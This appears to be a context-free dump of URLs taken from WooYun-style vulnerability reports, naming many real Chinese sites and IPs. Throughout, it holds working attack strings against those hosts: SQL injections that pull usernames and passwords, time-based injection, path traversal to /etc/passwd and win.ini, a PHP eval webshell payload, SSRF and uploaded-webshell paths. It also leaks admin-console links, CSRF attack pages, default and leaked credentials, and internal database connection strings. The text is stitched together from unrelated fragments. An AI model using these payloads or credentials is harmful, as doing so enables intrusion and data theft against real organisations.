http://**.**.**.**/bugs/wooyun-2010-0125687 http://www.chinabus.info/admin/js/upload.asp http://www.chinabus.info/pics/w.asp http://www.kugou.com/shop/user/addCommonAddress http://xss.gift/kugoucsrf.html www.apicloud.com http://user.ci123.com/account/EditUserInfo/detail http://xss.gift/yuercsrf.html http://222.190.116.172:9090/biplatform/sysLoginVerif.action http://t.95105555.com:9001/querySoft.action?name=a&type=1 http://**.**.**.**/zfxxgk/ysqgk/index.htm http://**.**.**.**/rcjl/outersearchPositionAction.do https://**.**.**.**/colincheng1016/LAUBE/blob/0eea31e20594ab42a561c46c49106b9a57550a8b/WebRoot/WEB-INF/eccom/config/mail.properties http://**.**.**.**/portal/security/login.xhtml http://**.**.**.**/Html/2015-8-21/Qpaper.Html http://www.gzbtte.net/admin http://**.**.**.**/trms/RackInfo.php?RackCD=330 http://115.231.105.56:8088/ http://42.62.21.44/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://jk.yaxia.com/login.php https://**.**.**.**/LoganDiger/hr/blob/3d5da121ee30039b851a08338a69d05eebafba8a/.svn/pristine/aa/aa9d609258441e105cc3639c591683dbc97b199a.svn-base http://www.yiban.cn/feed/add http://**.**.**.**/ http://gps.hznpt.com/Login.aspx http://gps.hznpt.com/Functions/data/detailCarInfo.aspx?id=101469 http://gps.hznpt.com/Functions/data/detailCarInfo.aspx?id=101469 http://gps.hznpt.com/Functions/data/detailCarInfo.aspx?id=101469 http://**.**.**.**:1300/ http://www.21cake.com/passport-lost.html http://58.63.38.180:9080/security/login?module http://old.ab95569.com/webins/ec/onlineSearchController.do?method=claimState&par=9060503202015000040&newflag=1&plyNO=2060503202014001800&icflag=1 http://old.ab95569.com/webins/ec/onlineSearchController.do?method=claimState&par=9030003202015000252&newflag=1&plyNO=2030003202014006658&icflag=1 http://**.**.**.**/ http://www.weifengke.com/map.html http://**.**.**.**/search/ http://redmine.emar.com/redmine/projects http://**.**.**.**/gz/xy/ http://wzb.hebtu.edu.cn/tongzhi.php?id=292 http://www.szytou.com/backpwd https://**.**.**.**/iXueping/obd2/blob/b16264f794698cf384053737e2f7e350b4675008/test/cn/voicet/metronic/email/MailTest.java http://mail.ucfgroup.com http://wm2.mail.cntv.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.165.145:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://221.130.182.230/igenus/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg http://www.bjcsf.com.cn/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg http://webmail.800buy.com/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg http://mail.ccig.com/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg http://61.175.193.195/webroot/login.php?Lang=../../../../../../../../../../etc/hosts%00.jpg http://221.130.182.230/igenus/login.php http://www.bjcsf.com.cn/login.php http://webmail.800buy.com/login.php http://mail.ccig.com/login.php http://61.175.193.195/webroot/login.php http://ms.itesting.cn/ http://mail.znufe.edu.cn/ http://mail2012.steelhome.cn/ http://mail2011.steelhome.cn/login.php http://mail.lkpc.com/ http://mail.germes.com.cn/ http://mail.chlitina.com.cn/ http://mail.airenhe.com/ http://211.151.135.17/ http://211.151.135.40/ http://203.156.205.53//login.php http://121.101.219.139/ http://mail.yxms.cn/webroot//login.php http://cmri1.hiall.com.cn/3306.txt http://www.mediav.com/ http://www.kingcms.com/download/k9/  http://www.focuznet.com/k9/t3012/ http://wooyun.org/bugs/wooyun-2015-0100601 http://**.**.**.**:80/getNewsContent.action http://**.**.**.**/gk_media/gnwjdyth/home.asp?so_sec_id=63&so_id=145513 http://**.**.**.**/products/pro_list.asp?products_sort=21 http://**.**.**.**/learn/index.asp?search_key=3&search_mode=2 http://**.**.**.**/manage/user/mail_subscibe.asp?mail=test@**.**.**.**&a_kanwu=1&a_kanwu=2&a_kanwu=3&a_kanwu=4&a_type=1&Submit=%CC%E1%BD%BB http://**.**.**.**/ http://地址/download.php?filename=../../../../etc/passwd http://222.29.240.102/ http://114.251.197.177/LoginCaiBan/UserLogin.aspx http://114.251.197.178/login/pmo/login.jsp www.emsgz.com http://www.c21wuhan.com.cn/news.html?types=1 http://www.qzyy.net.cn/news_detail_all.asp?id=19304 http://drops.wooyun.org/papers/3268 https://mail.30wish.net/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://www.nid.com.tw/nid/ASP/login.asp?logout=Y www.nid.com.tw www.nid.com.tw http://www.nid.com.tw http://apt.so/niaooo http://www.wushidou.cn/data.php?table=other&game=20a7d77ea9ae9d32370f8c03aa3502e3232cf78b bj.mangocity.com/visa/online.jsp http://**.**.**.**/login.do?message=102&verify= http://**.**.**.**/login.do?message=103&verify= http://**.**.**.**:89/login.do http://wiki.ops.cntv.cn/s/zh_CN/3145/3/1.0/_/images/../WEB-INF/web.xml http://edu.qq.com/a/20061207/000060.htm http://www229.clickeye.cn/network/clickeye.js http://**.**.**.**.mo/c_news/radio_news.php?id=265373 http://**.**.**.**/Address/AddAddress?ReturnPage=http://**.**.**.**/Address/AddressList&AddressId=259 http://**.**.**.**/Bank/AddBank?ReturnPage=http://**.**.**.**/Bank/BankList&BankId=283 http://**.**.**.**/Query/Per/Query_PerList.aspx http://www.apicloud.com/resetBySms www.apicloud.com http://www.apicloud.com http://me.hit.edu.cn/lab/newslist.aspx?newclassid=89 http://**.**.**.**/Default.aspx http://**.**.**.**/Database/SiteWeaver.mdb http://xss.gift/58csrf.html http://open.weimob.com/style.php http://fang.58.com/ajax/upload.php?input=pic1&img=img1 bbs.xinhehui.com/uc_server http://www.21cake.com/passport-lost.html填入自己手机号,正常填入验证码 http://www.etonmobile.com/index.php?g=Admin&m=Login http://wo.fql.me/ http://tcm.iquanyou.com.cn/tcm/userLogin.action http://jpkc.onlinesjtu.com/zzxyl/sztl/alfx_content.asp?id=9 http://sys.dfss.com.cn/ckfinder/ckfinder.html http://**.**.**.**/readnews.asp?id=8765 http://**.**.**.**/web/showone.asp?lm2=22 http://**.**.**.**/list.asp?n_kind=56&Types=56 http://**.**.**.**/show.asp?id=3182 http://**.**.**.**/zsyz.asp?id=26 http://**.**.**.**/wlwz.asp?id=29 http://**.**.**.**/wzjdx.asp?id=20 http://**.**.**.**/show.asp?cataId=A00160001&newsId=8379 http://**.**.**.**/vod.asp?cataId=A00160007&newsId=8404 http://**.**.**.**/Show.asp?cataId=A00030006&newsId=8366 http://**.**.**.**/Show.asp?CataId=A00160008&newsId=8265 http://**.**.**.**/sin_art.asp?id=20 http://**.**.**.**/art_list.asp?id=2 http://**.**.**.**/wsbs_more.asp?classid=14 http://**.**.**.**/list/Gklm.asp?id=140 http://**.**.**.**/hdq/hdq_wszx_faq_show.asp?id=11947 http://**.**.**.**/show.asp?id=1273 http://**.**.**.**/zjtl/showall.asp?table=tms2005&n=地理位置&lb1=1&lb2=9&fid=53 http://**.**.**.**/xwzxshowall.asp?table=tnews&n=铁岭要闻&fID=32943 http://**.**.**.**/E_ReadOpinion.asp?OpinionID=1549 http://www.gps199.com/login.aspx http://www.szpswl.com/Login.aspx http://www.gpscx.com/index.aspx http://its666.com/ http://www.szpswl.com/Functions/data/detailCarInfo.aspx?id=105337 http://www.gps199.cn/Functions/data/detailCarInfo.aspx?id=105337 http://www.gpscx.com/Functions/data/detailCarInfo.aspx?id=105377 http://www.gpscx.com/Functions/data/detailCarInfo.aspx?id=105377 http://**.**.**.**/oa/login.jsp http://**.**.**.** http://www.c-web.com.cn/ http://www.mescake.com/存在任意账号注册漏洞 http://**.**.**.**/Admin/examInfo/fileTmp/1622_%E5%AE%9C%E5%AE%BE%E5%8E%BF%E4%BA%8B%E4%B8%9A%E5%8D%95%E4%BD%8D2014%E5%B9%B4%E7%AC%AC%E4%B8%80%E6%AC%A1%E5%85%AC%E5%BC%80%E6%8B%9B%E8%81%98%E5%B7%A5%E4%BD%9C%E4%BA%BA%E5%91%98%E6%8B%9F%E8%81%98%E7%94%A8%E4%BA%BA%E5%91%98%E5%90%8D%E5%8D%95.htm http://**.**.**.**/Admin/examInfo/fileTmp/1372_%B9%D2%CD%F8=%B1%A8%C3%FB%BB%E3%D7%DC%A3%A8%C8%B7%B6%A8%A3%A9.htm http://bj.mangocity.com/visa/article.jsp?jspmaker_act_id=101 http://open.99bill.com/menu!AttachDownload.do?attach= http://open.99bill.com/menu!AttachDownload.do?attach=../../../../../../etc/passwd nursing.sysu.edu.cn/main/news/NewsList.aspx?no=168&pId=116 hcc2015.huawei.com/cn/CheckWorkingEmail u7406-http://be.zhinanmao.com/ http://be.zhinanmao.com/#tripfeedbacklist http://be.zhinanmao.com/#tripfeedbacklist http://be.zhinanmao.com/ http://59.151.12.39/Home/Index# http://59.151.12.38:89/ http://**.**.**.**/house/fangchan.asp?id=4787 http://**.**.**.**/ http://**.**.**.**:800/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://**.**.**.**:8080/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://**.**.**.**:800/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**:8080/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**:800/pweb/careerapply/HrmCareerApplyWorkEdit.jsp?id=1 http://**.**.**.**:8080/pweb/careerapply/HrmCareerApplyWorkEdit.jsp?id=1 http://**.**.**.**:800/pweb/careerapply/HrmCareerApplyWorkView.jsp?id=1 http://**.**.**.**:8080/pweb/careerapply/HrmCareerApplyWorkView.jsp?id=1 http://e-biding.gb246.com/global_Login.do http://crm.gb246.com/.svn/entries http://mail.gb246.com/.svn/entries http://vip.gb246.com/.svn/entries http://**.**.**.**:800/web/broswer/SectorInfoBrowser.jsp?sqlwhere=where http://**.**.**.**:8080/web/broswer/SectorInfoBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/SectorInfoBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/SectorInfoBrowser.jsp?sqlwhere=where http://**.**.**.**:800/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://**.**.**.**:8080/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://**.**.**.**:800/web/broswer/CustomerSizeBrowser.jsp?sqlwhere=where http://**.**.**.**:8080/web/broswer/CustomerSizeBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/CustomerSizeBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/CustomerSizeBrowser.jsp?sqlwhere=where http://v1.zhinanmao.com/?r=search%2Fsearch&seatxt=11&search_class=1 http://**.**.**.**,泄露考生信息 http://pgsd.sysu.edu.cn/dongtaizhongji.asp?cate=2&id=1439 http://haier.quanshi.com/ www.gogo.cn http://www.gogo.cn/?s=/abc/abc/abc/${@print%28eval%28$_POST[c]%29%29 http://**.**.**.**/ceo.asp?id=10 http://地址/~C:/WINDOWS/system32/drivers/etc/hosts http://**.**.**/gg_show.aspxid=@@version http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/webdisk//gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**//gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/dxwebdisk//gg_show.aspxid=@@version_ http://**.**.**/webdisk//gg_show.aspxid=@@version_ http://**.**.**//gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/wdisk//gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/wjfw/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**//gg_show.aspxid=@@version http://**.**.**.**/adm/index.php http://www.atsmart.net/download.php?filename= http://www.atsmart.net/download.php?filename=..//../../etc//passwd http://221.179.195.110/ http://www.mescake.com/、http://touch.mescake.com/ http://weixin.21cake.com/info.php,找到了网站目录 http://job.bbn.com.cn/login/top_count.action存在struts2 http://**.**.**.**/admin-console/可惜,此站该页被删 http://**.**.**.**/jmx-console/ http://**.**.**.**/login.asp http://drops.wooyun.org/web/7112 https://mp.weixin.qq.com/cgi-bin/setuserinfo?action=intro&t=ajax-response&token=589115843&lang=zh_CN&f=json&ajax=1&random=0.3911454190965742&intro=hacked%20by%20shidada https://mp.weixin.qq.com/cgi-bin/modifygroup?t=ajax-friend-group&token=589115843&lang=zh_CN&f=json&ajax=1&random=0.0741190540138632&func=add&name=helloasasas https://mp.weixin.qq.com/cgi-bin/setuserinfo?t=ajax-response&token=589115843&lang=zh_CN&f=json&ajax=1&random=0.5444546448998153&action=search&open=0 http://market.gb246.com http://market.gb246.com/upload.html http://**.**.**.**/ http://180.169.30.13:2046/ajax/uploadfile.php?DontCheckLogin=1 http://180.169.30.13:2046/tmpfile/upd211A.tmp.php http://prm.yonyou.com/login/login.php http://180.169.30.13:2046/login/login.php http://112.64.196.14/login/login.php http://crm.naide.com.cn/login/login.php http://crm.szclou.com:8088/login/login.php http://crm.szclou.com:8088/login/login.php http://119.6.104.10:7788/wap/login_wap.php http://qinyuancrm.com/login/login.php http://111.207.244.5:8888/login/login.php http://crm.transn.net/login/login.php http://etools1.bitp.cn:2000/login/login.php https://crm.itrus.com.cn/login/login.php http://kfdq369.gicp.net/login/login.php http://www.kdlian.com:8001/login/login.php https://crm.itrus.com.cn/login/login.php http://prm.chanjet.com/login/login.php http://xlcrm.tbea.com.cn:8088/login/login.php http://prm.ufida.com.cn/login/login.php http://crm.elfa.com.cn/login/login.php http://aqe.wyn88.com:9002 http://aqe.wyn88.com:9002/jquery/wooyun_test.jsp http://115.236.99.184/sys/main.action http://www.donews.com/idonews/article/6895.shtm http://www.donews.com/idonews/article/6895*.shtm http://jf.ztgame.com/detail.php?id=1114 http://**.**.**.**/bugs/wooyun-2010-058073)修复了,但还存在任意上传漏洞。 http://www.xingchetong.com/xingchetong/如图所示: http://g.xingchetong.com/SystemUser!exitSys.do,打开登录界面,如图所示: http://g.xingchetong.com http://www.picchealth.com/DesktopModules/C_Info/WebService/C_InfoService.asmx http://channel.wepiao.com/ http://channel.wepiao.com/index.php?r=Presell&cid=132 http://games.pwel.com.cn/EventsDota2/EventsDetailsArc4?cupId=879 http://shop.ehuatai.com/isale/risk/casualtyInsuranceAction-viewOrder.action?orderNo=201205023791 http://zbwmsreport.gb246.com/ReportServer/ http://zbwmsreport.gb246.com/ReportServer/Pages/ReportViewer.aspx?%2fB2C_MIS_CONSUMER&rs:Command=Render http://zbwmsreport.gb246.com/ReportServer/Pages/ReportViewer.aspx?%2fB2C_MOVE_PHYSIC&rs:Command=Render http://zbwmsreport.gb246.com/ReportServer/Pages/ReportViewer.aspx?%2fB2C_MIS_REVAT&rs:Command=Render http://zbwmsreport.gb246.com/ReportServer/Pages/ReportViewer.aspx?%2fBabyCarrierExistStorage&rs:Command=Render http://zbwmsreport.gb246.com/ReportServer/?%2fData+Sources&rs:Command=ListChildren http://zbwmsreport.gb246.com/ReportServer?%2fBMR_CX_FSDRP%2fDrpCenterZFZData&rs:Command=GetDataSourceContents http://27.223.70.21:8080/cc/ccframe/login.jsp http://www.innmall.cn/api/logs/ http://60.214.112.114:8400 http://download.74cms.com/download/74cms_v3.6_beta_20150817.zip http://sns.neusoft.com/index.php?act=doAdminLogin&app=home&mod=Public https://sro.hikvision.com/ http://scan.cninsure.net/common/cvar/CExec.jsp http://scan.cninsure.net/common/cvar/CExec.jsp http://shop.ehuatai.com/ http://pan.baidu.com/s/1qWGFevM http://myadmin.zol.com http://www.zol.com/admin/ http://123.129.51.44:8880/ http://**.**.**.**/ckfinder/ckfinder.html?action=js&func=SetFileField&data=xPicture&thumbFunc=ShowThumbnails&start=Images.asp%3A%2F%3A0 http://**.**.**.**/admin/ajaxgetty.ashx?gy=9L%27;waitfor%20delay%20%270:0:10%27;--%20-anUrwfN&t=0.9660481179598719&type=A http://**.**.**.**/admin admin:admin http://mcice.gb246.com/ http://mcice.gb246.com/admin-console/login.seam?conversationId=1979 http://mcice.gb246.com/jmx-console/ http://www.sobot.com/console//haha/logo/20c7508fb91d478cb18d85503ec6d769.jsp?pwd=023&i=id http://oa.cn.umiwi.com/index/index http://**.**.**.**/、http://**.**.**.**用户登录处注入 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/gcxm.asp?id=9704 http://new.testcenter.gov.cn:8080/index.php http://www.testcenter.gov.cn/ http://new.testcenter.gov.cn:8080/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini http://new.testcenter.gov.cn:8080/css/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini http://new.testcenter.gov.cn:8080/index.php cn:8080 http://**.**.**/getGoodsDetailWapfruitId=598 http://structure.hfut.edu.cn:80/news/view.php?id=177&type=zxxw http://yqkx.hfut.edu.cn:80/college_list.php?id=269 http://gdjy.hfut.edu.cn:80/picNewsInfo.jsp?id=1 http://dwxy.hfut.edu.cn:80/listxs.php?id=768&title=%D4%BA%B3%A4%D6%C2%B4%C7&nid=251 http://szb.hfut.edu.cn/news/shownews.php?lang=cn&id=127 http://yxgcxy.hfut.edu.cn:80/about.php?tid=19 http://structure.hfut.edu.cn:80/news/view.php?id=177&type=zxxw http://yqkx.hfut.edu.cn:80/college_list.php?id=269 http://gdjy.hfut.edu.cn:80/picNewsInfo.jsp?id=1 http://dwxy.hfut.edu.cn:80/listxs.php?id=768&title=%D4%BA%B3%A4%D6%C2%B4%C7&nid=251 http://szb.hfut.edu.cn/news/shownews.php?lang=cn&id=127 http://yxgcxy.hfut.edu.cn:80/about.php?tid=19 http://www.supident.com/?f=show&catid=23&id=145 http://**.**.**.**/grid/portal/base/login.action http://btr-daxue.800best.com/Account/Login http://**.**.**.**/defaultroot/aep/login.jsp http://**.**.**.**:7001/defaultroot/Logon.do https://**.**.**.**/s?wd=inurl%3Adefaultroot%2F&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=1&rsv_sug3=5&rsv_sug1=4&rsv_n=2&rsv_sug2=0&inputT=2953&rsv_sug4=2953 http://www.tclcomm.com//manual.asp?typeid=1 http://www.tclcomm.cn/product_detail.asp?Pid=1032 http://www.tclcomm.com/product/productsearch.asp https://github.com/xym-loveit/lucky-imoney jdbc:oracle:thin:@10.79.11.213:1521:actbmdb jdbc:oracle:thin:@localhost:1521:sfpay jdbc:oracle:thin:@10.79.11.217:1521:coredb jdbc:oracle:thin:@10.79.11.213:1521:coredb http://10.79.11.207:9014/sms/hessian http://10.79.11.207:9002/account/hessian http://10.79.11.207:9004/member/hessian http://10.79.11.207:9006/order/hessian http://10.79.11.207:9001/report/hessian http://10.79.11.207:9007/oms-server/hessian http://10.79.11.207:9011/rmms/hessian http://10.79.11.207:9010/schedule/hessian http://10.79.11.207:9012/acquirer/hessian http://10.79.11.207:9008/mms/hessian http://10.79.11.207:9020/waybill/hessian jdbc:mysql://127.0.0.1:3306/lucky?useUnicode=true&characterEncoding=utf8 www.sf-card.com【顺丰速运】 http://edu.189.cn/eschool-user-portal/register/findInfoByAccount.do?_d=1440551725189&accountString=test&bindType=0&Token=-1 http://edu.189.cn/eschool-user-portal/auth/loginPage.do http://**.**.**.**/njr.sql http://pp.funshion.com/monitor/user_login/ http://60.13.143.170:8080 http://**.**.**.** http://px.circ.gov.cn/tabid/95/Default.aspx http://218.200.48.230:8091/ http://be.zhinanmao.com/#triparticlelist http://admin.hp1997.com name:wlhp10015 pass:wlhp10015 http://115.182.93.108:8080/ guest:guest登陆,,,,同样能泄露大量机器信息 root:letv!@# http://eyemain.znv.com/ http://**.**.**.**/user/fastlogin.json?mobile=18511339112&verify_code=4480&anycode=soask_**.**.**.** http://**.**.**.**:8512/HWTRP/../ http://**.**.**.**/111/index.jsp http://zdys.zju.edu.cn/bmdt_info.php?id=1053 http://123.127.251.8:7001/console/ http://123.127.251.8:7001/system/warning.jsp jdbc:oracle:thin:@10.10.134.23:1521:slistest jdbc:oracle:thin:@10.10.139.20:1522:ora57 www.wy-fund.com http://0cx.cc/phpcms_phpsso_auth_key.jspx http://wooyun.org/bugs/wooyun-2014-065560 http://123.127.251.11 http://123.71.192.123:8085 http://ok.okchang.com/report/ http://xss.gift/okchangcsrf.html http://blog.ccjt.net/batch.common.php?action=modelquote&cid=1&name=spacecomments http://blog.ccjt.net/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,group_concat%28uid,0x7c,username,0x7c,password,0x7c,email%29,7,8,9,10,11,count%28*%29%20from%20uc_members%20where%20uid=2%23 http://**.**.**.**/company.asp?id=dfzy980720 encap:Ethernet F8:63:FD fef8:63fd/64 Scope:Link MTU:1500 packets:3251136 packets:1749629 txqueuelen:1000 http://121.34.253.167:7001/ weblogic:weblogic http://121.34.253.167:7001/Ninty/Ninty.jsp http://**.**.**.**/admin/Main.asp http://oa.okair.net/seeyon/logs/login.log无法获取,方法是再加一个目录符http://oa.okair.net/seeyon//logs/login.log: http://1.202.246.5:8080/OrderDetialInfo.aspx http://www-baidu.co/ql/x.php http://user.blyol.com/detail/?id=21286 http://jpkc.sysu.edu.cn/sxgl/info_view.asp?VID=545 http://www.ahjsfy.com:82/admin/chwSysEmployor_login.action存在命令执行漏洞 http://wooyun.org/bugs/wooyun-2015-097749 http://bbs.wasu.cn/home.php?mod=task&do=view&id=1 https://**.**.**.**/Francispp/cms/blob/0c63b2e2ba6d17fe43807fbb5fe8e773b5f7ef26/.svn/pristine/b2/b225134ad59442650db88b8f734801079231a0c7.svn-base http://www.xxsjsw.gov.cn/HNWeb/conference/09zrpxbmore.aspx?category=202 http://www.xxsjsw.gov.cn/hnweb/conference/08dsdhhymore.aspx?category=156 http://ops.cntv.cn http://www.jscz.gov.cn:7001/coremail/index.jsp http://www.jscz.gov.cn:7001/coremail/index.jsp http://pay.soufun.com/Log.aspx?id=6 http://pay.soufun.com/manager/login.aspx http://www.163disk.com/admin/ http://**.**.**.**/admin/CYCL_see.aspx?tc=congye&id=573/admin/CYCL_see.aspx?tc=congye&id=573存在注入漏洞,参数id http://**.**.**.**/News_model.asp?nid=22 https://github.com/limijiaoyin/php-ihome/blob/c38b1160d0022d1306e566f78125ecc4408e9d35/ihome/data/data_mail.php https://github.com/songziming/webmail/blob/d23894b571e6d2373eef6d7e3d65ec61c0327607/config.js http://club.show.sina.com.cn user:club_user@10.192.17.153 http://product.7po.com/index/product?id=219&zz=1 http://**.**.**.**/Address/145162 http://**.**.**.**/GoodsUserOrder/MyOrderList_sw?UserID=145162&PageSize=10&PageIndex=1 http://**.**.**.**/StreetReview/145162/StreetReview?PageSize=10&PageIndex=1 http://administrator.datebao.com/custom/service/lipei/show/39 http://opadmin.datebao.com/customer/customer_access https://github.com/laodaxyz/python_scripts/blob/e1838d85a9863c15c3a9b39607bbf59123bf7bfd/sendmail.py http://**.**.**.**/ http://**.**.**.**/eqspace/jjie@**.**.**.**?form=s_nfolder&myparent=/%B9%FA%BC%D2%B2%E2%BB%E6%B5%D8%C0%ED%D0%C5%CF%A2%BE%D6%CE%C4%BC%FE http://180.169.30.13:2046/ajax/swfupload.php?DontCheckLogin=1&vname=file http://180.169.30.13:2046/tmpfile//swf2121.tmp.php http://prm.yonyou.com/login/login.php http://180.169.30.13:2046/login/login.php http://112.64.196.14/login/login.php http://crm.naide.com.cn/login/login.php http://crm.szclou.com:8088/login/login.php http://crm.szclou.com:8088/login/login.php http://119.6.104.10:7788/wap/login_wap.php http://qinyuancrm.com/login/login.php http://111.207.244.5:8888/login/login.php http://crm.transn.net/login/login.php http://etools1.bitp.cn:2000/login/login.php https://crm.itrus.com.cn/login/login.php http://kfdq369.gicp.net/login/login.php http://www.kdlian.com:8001/login/login.php https://crm.itrus.com.cn/login/login.php http://prm.chanjet.com/login/login.php http://xlcrm.tbea.com.cn:8088/login/login.php http://prm.ufida.com.cn/login/login.php http://crm.elfa.com.cn/login/login.php http://**.**.**.**/xw.asp?id=44 http://**.**.**.**/cn/index_74.html http://www.ciicts.com.cn/eng/qianzheng2.asp?id=44 http://vote.yeshj.com/Hypervisor/ http://vote.yeshj.com/Hypervisor/default.aspx?keyword='or http://mt.sogou.com/bbs/ http://123.127.217.137:7001/console/ http://123.127.217.137:7001/jmxroot/jmxroot.jsp http://www.chinawutong.com/FindPSW/InputUserName.aspx http://roadshow.cnfol.com/show/ajaxlist/13293?name=1&page=1&sort=0&type=0 http://csc.zte.com.cn/CSC/UILoader/login.aspx site:csc.zte.com.cn,发现大量秘密级别文档,全部是项目相关文档 http://csc.zte.com.cn/AttachCenter/AttachDownload.aspx?p=EN4FOMh5cAc3JOpiypPFoMCVzNlN4kILX87QDpcaPJTtW6fumZiyXf4C3Cq4dMuC http://csc.zte.com.cn/AttachCenter/AttachDownload.aspx?p=X4usxCq6tXxZAjZFXNkM%2FeIkvfrWUewrODeFAjgQMIpdoYwjpZIHauzrJkDntXpb http://csc.zte.com.cn/AttachCenter/AttachDownload.aspx?p=8yRlrrPmJM2AGjq%2F9dXKq1aOPoNjsW2KiQP0psyJyZONWpKaXklbZXJy5H8HMgD2 http://csc.zte.com.cn/AttachCenter/AttachDownload.aspx?p=n0YbqdgE5nhUJpAOxkdBvMw%2BVpKv7qTOPWHpEIcoRqvuU0sqsAdtZDjpwoALPccN http://csc.zte.com.cn/AttachCenter/AttachDownload.aspx?p=2egd7jvMCCP9uLuqvcTZjDuka0VhRylkLTMO5K0GzLqQ%2BT0ZlOwwnujnRe6a0Xy7 http://**.**.**.**/index.htm http://new.edong.com:80/ https://github.com/HEYanTao/QuantitativeTrading/blob/21d97feff96ed5d6ce91e82b50a50b535066660d/WarningSystem/sendwarning.m http://**.**.**.**/fdc/news.php?news_id=566 http://**.**.**.**/admin http://**.**.**.**/bugs/wooyun-2010-086554可以继续深入就不多说了,当然这里没有继续深入 http://www.jzq001.com/forum.php?mod=viewthread&tid=45865&extra=page%253D1&page=1 http://**.**.**.**/web/login.do http://oa.guanhao.com:8080/kingdee/tree/tree/get_mail_value.jsp?ids=1&flag=dept http://www.hiall.com.cn/users/edit.php http://games.pwel.com.cn/MatchDota2/EventsDetailsArc2?userid=100013&userstr=1&cupId=1 http://games.pwel.com.cn/MatchDota2/EventsDetailsArc2?userid=100013&userstr=1&cupId=865 http://**.**.**.**/upload/ http://**.**.**.**/upload/201403/filename.zip http://**.**.**.**/bocadmin/ http://mis.998.com/GreenTreeInn/Login.aspx https://report.ztgame.com/game/ http://27.112.87.199/ ip:123.57.220.206登陆,刚打开就看到了这个,资源管理系统,吓我一跳,我还以为管理员在线呢。。。 http://open.ctrip.com/help/download.aspx?belong=CooperationMode&pagename=download http://hotelv2.ctripapi.cn http://www.hefeiciming.com/tjsb_list.php?cat_pid=33&cat_id=34 http://test.pwel.com.cn/EventsDota2/EventsDetailsArc4?cupId= http://test.pwel.com.cn/MatchDota2/EventsDetailsArc2?userid=100013&userstr=1&cupId=1 http://e.chuchujie.com/admin/checking http://app.gz163.cn/kd/admin/ http://www.21boya.cn/shgreenbox/App/Admin/Lang/conn.php http://office.homeinns.com/Hcs/uploadfiles/ http://oa.homeinns.com/Voucher/Tasks/TaskList.aspx http://bbs.51job.com/adminbbsjob.php 